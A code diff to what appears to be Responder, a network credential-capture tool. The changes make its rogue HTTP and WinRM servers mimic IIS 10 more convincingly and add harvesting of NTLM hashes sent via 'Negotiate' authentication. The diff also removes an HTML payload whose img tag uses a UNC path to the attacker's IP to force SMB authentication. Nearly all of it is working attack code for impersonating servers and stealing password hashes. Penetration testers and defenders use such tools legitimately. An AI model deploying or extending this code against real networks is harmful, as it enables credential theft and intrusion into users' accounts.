diff --git a/packets.py b/packets.py
index e8503f5..997b102 100755
--- a/packets.py
+++ b/packets.py
@@ -365,7 +365,7 @@ class NTLM_Challenge(Packet):
 		("TargetInfoLen",    "\x7e\x00"),
 		("TargetInfoMaxLen", "\x7e\x00"),
 		("TargetInfoOffset", "\x3e\x00\x00\x00"),
-		("NTLMOsVersion",    "\x05\x02\xce\x0e\x00\x00\x00\x0f"),
+		("NTLMOsVersion",    "\x0a\x00\x7c\x4f\x00\x00\x00\x0f"),
 		("TargetNameStr",    settings.Config.Domain),
 		("Av1",              "\x02\x00"),#nbt name
 		("Av1Len",           "\x06\x00"),
@@ -426,25 +426,59 @@ class NTLM_Challenge(Packet):
 class IIS_Auth_401_Ans(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 401 Unauthorized\r\n"),
-		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
-		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
 		("Type",          "Content-Type: text/html\r\n"),
-		("WWW-Auth",      "WWW-Authenticate: NTLM\r\n"),
-		("Len",           "Content-Length: 0\r\n"),
-		("CRLF",          "\r\n"),
+		("ServerType",    "Server: Microsoft-IIS/10.0\r\n"),
+		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
+		("WWW-Auth",      "WWW-Authenticate: Negotiate\r\n"),
+		("WWW-Auth2",     "WWW-Authenticate: NTLM\r\n"),
+		("Len",           "Content-Length: "),
+		("ActualLen",     "76"),
+		("CRLF",          "\r\n\r\n"),
+		("Payload",       """<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
+<title>401 - Unauthorized: Access is denied due to invalid credentials.</title>
+<style type="text/css">
+<!--
+body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
+fieldset{padding:0 15px 10px 15px;} 
+h1{font-size:2.4em;margin:0;color:#FFF;}
+h2{font-size:1.7em;margin:0;color:#CC0000;} 
+h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} 
+#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
+background-color:#555555;}
+#content{margin:0 0 0 2%;position:relative;}
+.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
+-->
+</style>
+</head>
+<body>
+<div id="header"><h1>Server Error</h1></div>
+<div id="content">
+ <div class="content-container"><fieldset>
+  <h2>401 - Unauthorized: Access is denied due to invalid credentials.</h2>
+  <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
+ </fieldset></div>
+</div>
+</body>
+</html>
+"""),
 	])
+	def calculate(self):
+		self.fields["ActualLen"] = len(str(self.fields["Payload"]))
 
 class IIS_Auth_Granted(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 200 OK\r\n"),
-		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
+		("ServerType",    "Server: Microsoft-IIS/10.0\r\n"),
 		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
 		("Type",          "Content-Type: text/html\r\n"),
 		("WWW-Auth",      "WWW-Authenticate: NTLM\r\n"),
 		("ContentLen",    "Content-Length: "),
 		("ActualLen",     "76"),
 		("CRLF",          "\r\n\r\n"),
-		("Payload",       "<html>\n<head>\n</head>\n<body>\n<img src='file:\\\\\\\\\\\\"+RespondWithIP()+"\\smileyd.ico' alt='Loading' height='1' width='2'>\n</body>\n</html>\n"),
+		("Payload",       ""),
 	])
 	def calculate(self):
 		self.fields["ActualLen"] = len(str(self.fields["Payload"]))
@@ -452,22 +486,29 @@ class IIS_Auth_Granted(Packet):
 class IIS_NTLM_Challenge_Ans(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 401 Unauthorized\r\n"),
-		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
+		("ServerType",    "Server: Microsoft-IIS/10.0\r\n"),
 		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
 		("Type",          "Content-Type: text/html\r\n"),
 		("WWWAuth",       "WWW-Authenticate: NTLM "),
 		("Payload",       ""),
 		("Payload-CRLF",  "\r\n"),
-		("Len",           "Content-Length: 0\r\n"),
-		("CRLF",          "\r\n"),
+		("ContentLen",    "Content-Length: "),
+		("ActualLen",     "76"),
+		("CRLF",          "\r\n\r\n"),
+		("Payload2",       """<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
+<HTML><HEAD><TITLE>Not Authorized</TITLE>
+<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
+<BODY><h2>Not Authorized</h2>
+<hr><p>HTTP Error 401. The requested resource requires user authentication.</p>
+</BODY></HTML>
+"""),
 	])
-
-	def calculate(self,payload):
-		self.fields["Payload"] = b64encode(payload)
+	def calculate(self):
+		self.fields["ActualLen"] = len(str(self.fields["Payload2"]))
 
 class WinRM_NTLM_Challenge_Ans(Packet):
 	fields = OrderedDict([
-		("Code",          "HTTP/1.1 401 \r\n"),
+		("Code",          "HTTP/1.1 401\r\n"),
 		("WWWAuth",       "WWW-Authenticate: Negotiate "),
 		("Payload",       ""),
 		("Payload-CRLF",  "\r\n"),
@@ -483,21 +524,52 @@ class WinRM_NTLM_Challenge_Ans(Packet):
 class IIS_Basic_401_Ans(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 401 Unauthorized\r\n"),
-		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
-		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
+		("ServerType",    "Server: Microsoft-IIS/10.0\r\n"),
 		("Type",          "Content-Type: text/html\r\n"),
 		("WWW-Auth",      "WWW-Authenticate: Basic realm=\"Authentication Required\"\r\n"),
-		("AllowOrigin",   "Access-Control-Allow-Origin: *\r\n"),
-		("AllowCreds",    "Access-Control-Allow-Credentials: true\r\n"),
-		("Len",           "Content-Length: 0\r\n"),
-		("CRLF",          "\r\n"),
+		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
+		("Len",           "Content-Length: "),
+		("ActualLen",     "76"),
+		("CRLF",          "\r\n\r\n"),
+		("Payload",       """<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
+<title>401 - Unauthorized: Access is denied due to invalid credentials.</title>
+<style type="text/css">
+<!--
+body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
+fieldset{padding:0 15px 10px 15px;} 
+h1{font-size:2.4em;margin:0;color:#FFF;}
+h2{font-size:1.7em;margin:0;color:#CC0000;} 
+h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} 
+#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
+background-color:#555555;}
+#content{margin:0 0 0 2%;position:relative;}
+.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
+-->
+</style>
+</head>
+<body>
+<div id="header"><h1>Server Error</h1></div>
+<div id="content">
+ <div class="content-container"><fieldset>
+  <h2>401 - Unauthorized: Access is denied due to invalid credentials.</h2>
+  <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
+ </fieldset></div>
+</div>
+</body>
+</html>
+"""),
 	])
+	def calculate(self):
+		self.fields["ActualLen"] = len(str(self.fields["Payload"]))
 
 ##### Proxy mode Packets #####
 class WPADScript(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 200 OK\r\n"),
-		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
+		("ServerType",    "Server: Microsoft-IIS/10.0\r\n"),
 		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
 		("Type",          "Content-Type: application/x-ns-proxy-autoconfig\r\n"),
 		("ContentLen",    "Content-Length: "),
@@ -514,7 +586,7 @@ class ServeExeFile(Packet):
 		("ContentType",   "Content-Type: application/octet-stream\r\n"),
 		("LastModified",  "Last-Modified: "+HTTPCurrentDate()+"\r\n"),
 		("AcceptRanges",  "Accept-Ranges: bytes\r\n"),
-		("Server",        "Server: Microsoft-IIS/7.5\r\n"),
+		("Server",        "Server: Microsoft-IIS/10.0\r\n"),
 		("ContentDisp",   "Content-Disposition: attachment; filename="),
 		("ContentDiFile", ""),
 		("FileCRLF",      ";\r\n"),
@@ -536,7 +608,7 @@ class ServeHtmlFile(Packet):
 		("ContentType",   "Content-Type: text/html\r\n"),
 		("LastModified",  "Last-Modified: "+HTTPCurrentDate()+"\r\n"),
 		("AcceptRanges",  "Accept-Ranges: bytes\r\n"),
-		("Server",        "Server: Microsoft-IIS/7.5\r\n"),
+		("Server",        "Server: Microsoft-IIS/10.0\r\n"),
 		("ContentLen",    "Content-Length: "),
 		("ActualLen",     "76"),
 		("Date",          "\r\nDate: "+HTTPCurrentDate()+"\r\n"),
@@ -551,7 +623,7 @@ class ServeHtmlFile(Packet):
 class WPAD_Auth_407_Ans(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 407 Unauthorized\r\n"),
-		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
+		("ServerType",    "Server: Microsoft-IIS/10.0\r\n"),
 		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
 		("Type",          "Content-Type: text/html\r\n"),
 		("WWW-Auth",      "Proxy-Authenticate: NTLM\r\n"),
@@ -567,7 +639,7 @@ class WPAD_Auth_407_Ans(Packet):
 class WPAD_NTLM_Challenge_Ans(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 407 Unauthorized\r\n"),
-		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
+		("ServerType",    "Server: Microsoft-IIS/10.0\r\n"),
 		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
 		("Type",          "Content-Type: text/html\r\n"),
 		("WWWAuth",       "Proxy-Authenticate: NTLM "),
@@ -583,7 +655,7 @@ class WPAD_NTLM_Challenge_Ans(Packet):
 class WPAD_Basic_407_Ans(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 407 Unauthorized\r\n"),
-		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
+		("ServerType",    "Server: Microsoft-IIS/10.0\r\n"),
 		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
 		("Type",          "Content-Type: text/html\r\n"),
 		("WWW-Auth",      "Proxy-Authenticate: Basic realm=\"Authentication Required\"\r\n"),
@@ -600,7 +672,7 @@ class WEBDAV_Options_Answer(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 200 OK\r\n"),
 		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
-		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
+		("ServerType",    "Server: Microsoft-IIS/10.0\r\n"),
 		("Allow",         "Allow: GET,HEAD,POST,OPTIONS,TRACE\r\n"),
 		("Len",           "Content-Length: 0\r\n"),
 		("Keep-Alive:", "Keep-Alive: timeout=5, max=100\r\n"),
@@ -688,7 +760,7 @@ class MSSQLNTLMChallengeAnswer(Packet):
 		("TargetInfoLen",    "\x7e\x00"),
 		("TargetInfoMaxLen", "\x7e\x00"),
 		("TargetInfoOffset", "\x3e\x00\x00\x00"),
-		("NTLMOsVersion",    "\x05\x02\xce\x0e\x00\x00\x00\x0f"),
+		("NTLMOsVersion",    "\x0a\x00\x7c\x4f\x00\x00\x00\x0f"),
 		("TargetNameStr",    settings.Config.Domain),
 		("Av1",              "\x02\x00"),#nbt name
 		("Av1Len",           "\x06\x00"),
@@ -1696,7 +1768,7 @@ class SMB2NegoAns(Packet):
 		("Signing",         "\x01\x00"),
 		("Dialect",         "\xff\x02"),
 		("Reserved",        "\x00\x00"),
-		("Guid",            "\xee\x85\xab\xf7\xea\xf6\x0c\x4f\x92\x81\x92\x47\x6d\xeb\x76\xa9"),
+		("Guid",            urandom(16).decode('latin-1')),
 		("Capabilities",    "\x07\x00\x00\x00"),
 		("MaxTransSize",    "\x00\x00\x10\x00"),
 		("MaxReadSize",     "\x00\x00\x10\x00"),
diff --git a/servers/HTTP.py b/servers/HTTP.py
index 91acf3f..c35df51 100644
--- a/servers/HTTP.py
+++ b/servers/HTTP.py
@@ -167,6 +167,7 @@ def GrabURL(data, host):
 # Handle HTTP packet sequence.
 def PacketSequence(data, client, Challenge):
 	NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
+	NTLM_Auth2 = re.findall(r'(?<=Authorization: Negotiate )[^\r]*', data)
 	Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)
 
 	# Serve the .exe if needed
@@ -193,7 +194,7 @@ def PacketSequence(data, client, Challenge):
 			Buffer.calculate()
 
 			Buffer_Ans = IIS_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
-			#Buffer_Ans.calculate(Buffer)
+			Buffer_Ans.calculate()
 			return Buffer_Ans
 
 		if Packet_NTLM == b'\x03':
@@ -212,6 +213,36 @@ def PacketSequence(data, client, Challenge):
 				Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
 				Buffer.calculate()
 				return Buffer
+				
+	elif NTLM_Auth2:
+		Packet_NTLM = b64decode(''.join(NTLM_Auth2))[8:9]
+		if Packet_NTLM == b'\x01':
+			GrabURL(data, client)
+			#GrabReferer(data, client)
+			GrabCookie(data, client)
+
+			Buffer = NTLM_Challenge(ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+			Buffer.calculate()
+			Buffer_Ans = IIS_NTLM_Challenge_Ans(WWWAuth = "WWW-Authenticate: Negotiate ", Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
+			Buffer_Ans.calculate()
+			return Buffer_Ans
+
+		if Packet_NTLM == b'\x03':
+			NTLM_Auth = b64decode(''.join(NTLM_Auth2))
+			if IsWebDAV(data):
+                                 module = "WebDAV"
+			else:
+                                 module = "HTTP"
+			ParseHTTPHash(NTLM_Auth, Challenge, client, module)
+
+			if settings.Config.Force_WPAD_Auth and WPAD_Custom:
+				print(text("[HTTP] WPAD (auth) file sent to %s" % client.replace("::ffff:","")))
+
+				return WPAD_Custom
+			else:
+				Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
+				Buffer.calculate()
+				return Buffer
 
 	elif Basic_Auth:
 		ClearText_Auth = b64decode(''.join(Basic_Auth))
@@ -239,12 +270,16 @@ def PacketSequence(data, client, Challenge):
 			return Buffer
 	else:
 		if settings.Config.Basic:
-			Response = IIS_Basic_401_Ans()
+			r = IIS_Basic_401_Ans()
+			r.calculate()
+			Response = r
 			if settings.Config.Verbose:
 				print(text("[HTTP] Sending BASIC authentication request to %s" % client.replace("::ffff:","")))
 
 		else:
-			Response = IIS_Auth_401_Ans()
+			r = IIS_Auth_401_Ans()
+			r.calculate()
+			Response = r
 			if settings.Config.Verbose:
 				print(text("[HTTP] Sending NTLM authentication request to %s" % client.replace("::ffff:","")))
 
diff --git a/servers/WinRM.py b/servers/WinRM.py
index dda1355..dcdd013 100644
--- a/servers/WinRM.py
+++ b/servers/WinRM.py
@@ -125,12 +125,16 @@ def PacketSequence(data, client, Challenge):
 		return Buffer
 	else:
 		if settings.Config.Basic:
-			Response = IIS_Basic_401_Ans()
+			r = IIS_Basic_401_Ans()
+			r.calculate()
+			Response = r
 			if settings.Config.Verbose:
 				print(text("[WinRM] Sending BASIC authentication request to %s" % client.replace("::ffff:","")))
 
 		else:
-			Response = IIS_Auth_401_Ans()
+			r = IIS_Auth_401_Ans()
+			r.calculate()
+			Response = r
 			if settings.Config.Verbose:
 				print(text("[WinRM] Sending NTLM authentication request to %s" % client.replace("::ffff:","")))
 
@@ -176,5 +180,6 @@ class WinRM(BaseRequestHandler):
 		
 		except:
 			self.request.close()
+			raise
 			pass